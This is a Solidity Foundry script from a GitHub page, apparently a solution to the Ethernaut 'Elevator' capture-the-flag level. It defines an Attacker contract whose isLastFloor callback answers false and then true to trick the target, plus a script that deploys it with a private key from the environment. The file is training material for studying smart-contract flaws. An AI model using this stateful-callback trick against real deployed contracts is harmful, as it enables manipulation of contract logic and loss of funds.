-
Notifications
You must be signed in to change notification settings - Fork 116
/
level11.s.sol
43 lines (31 loc) · 1.03 KB
/
level11.s.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script} from "forge-std/Script.sol";
import {Elevator, Building} from "../src/level11/Elevator.sol";
contract Attacker is Building {
Elevator elevator;
bool hasCalled;
constructor(address elevator_) {
elevator = Elevator(elevator_);
}
function isLastFloor(uint256 _floor) public returns (bool) {
if (hasCalled) return true;
hasCalled = true;
return false;
}
function attack(uint floor) public {
elevator.goTo(floor);
}
}
contract CallContractScript is Script {
function run() external {
// 指定私钥,可以从环境变量中获取,例如:process.env.PRIVATE_KEY
uint256 privateKey = vm.envUint("PRIVATE_KEY");
// 初始化一个签名者
vm.startBroadcast(privateKey);
address levelAddr = 0x5B0424701F6f9a8e27CF76DAfC918A5E558f0Dc5;
Attacker attacker = new Attacker(levelAddr);
attacker.attack(100);
vm.stopBroadcast();
}
}